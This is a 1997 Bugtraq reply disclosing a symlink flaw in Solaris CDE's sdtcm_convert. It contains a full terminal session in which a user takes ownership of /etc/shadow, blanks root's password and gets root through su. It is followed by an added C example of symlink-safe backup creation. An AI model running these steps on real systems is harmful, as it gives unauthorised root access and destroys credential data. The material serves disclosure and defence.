Bugtraq mailing list archives
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
From: adam () MATH TAU AC IL (Adam Morrison)
Date: Sun, 23 Feb 1997 12:45:40 +0200
Is this the bug fixed in the Sun patches:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
or is it a new one?
That's hard to know, since this patch is not publicly available off
SunSolve (not right now, anyway).
There's at least one other hole in sdtcm_convert which this patch may or may
not fix.
CDE is generally a can of worms.
$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
Script started on Thu Jul 11 22:15:03 1996
22:15  [wumpus:~] % whoami
adam
22:15  [wumpus:~] % ls -l /etc/shadow
-r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
22:15  [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15  [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...
WARNING!! Data will be lost when converting version 4 data format
back to version 3 data format.
Do you want to continue? (Y/N) [Y] y
Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments                    = 0
Number of one-time appointments converted       = 0
Number of repeating appointments converted      = 0
Number of one-time appointments pruned          = 0
Number of repeating appointments pruned         = 0
The original file is saved in /tmp/calorig.adam
22:15  [wumpus:~] % ls -l /etc/shadow
-r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
22:15  [wumpus:~] % chmod 644 /etc/shadow
22:15  [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15  [wumpus:~] % ls -l /etc/shadow
-rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
22:15  [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16  [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit
script done on Thu Jul 11 22:16:21 1996
                                                adam?
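Added example, not part of the original post and not Sun's code: in the transcript above, a symlink planted at the backup name leaves the link's target owned by the calling user. The C sketch below shows how a privileged program can create such a backup file so that a planted link is refused, assuming a POSIX system; `create_backup`, `demo_symlink_refused` and the file names in the constructed scenario are hypothetical.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a backup file at `path` and hand it to owner:group.
 * Returns an open descriptor, or -1 if it could not be created safely. */
int create_backup(const char *path, uid_t owner, gid_t group)
{
    /* O_EXCL fails if any name, symlink included, already exists at path;
     * O_NOFOLLOW additionally refuses a symlink as the final component. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    /* Change ownership through the descriptor, never through the path:
     * a path-based chown() acts on whatever the name points to now. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        fchown(fd, owner, group) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink sits at the backup name before the call.
 * Returns 1 if it is refused, its target is untouched and a fresh name
 * still works; 0 otherwise; -1 on setup failure. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/backup-demo-XXXXXX", target[64], lnk[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(lnk, sizeof lnk, "%s/calorig.user", dir);
    int t = open(target, O_WRONLY | O_CREAT | O_EXCL, 0400);
    if (t < 0 || close(t) != 0 || symlink(target, lnk) != 0) return -1;
    int refused = create_backup(lnk, getuid(), getgid()) == -1;
    int intact = stat(target, &st) == 0 && (st.st_mode & 0777) == 0400 && st.st_size == 0;
    unlink(lnk);
    int fd = create_backup(lnk, getuid(), getgid());   /* name is free now */
    int fresh = fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 0777) == 0600;
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(target); rmdir(dir);
    return refused && intact && fresh;
}
int main(void) { printf("%d\n", demo_symlink_refused()); return 0; }
```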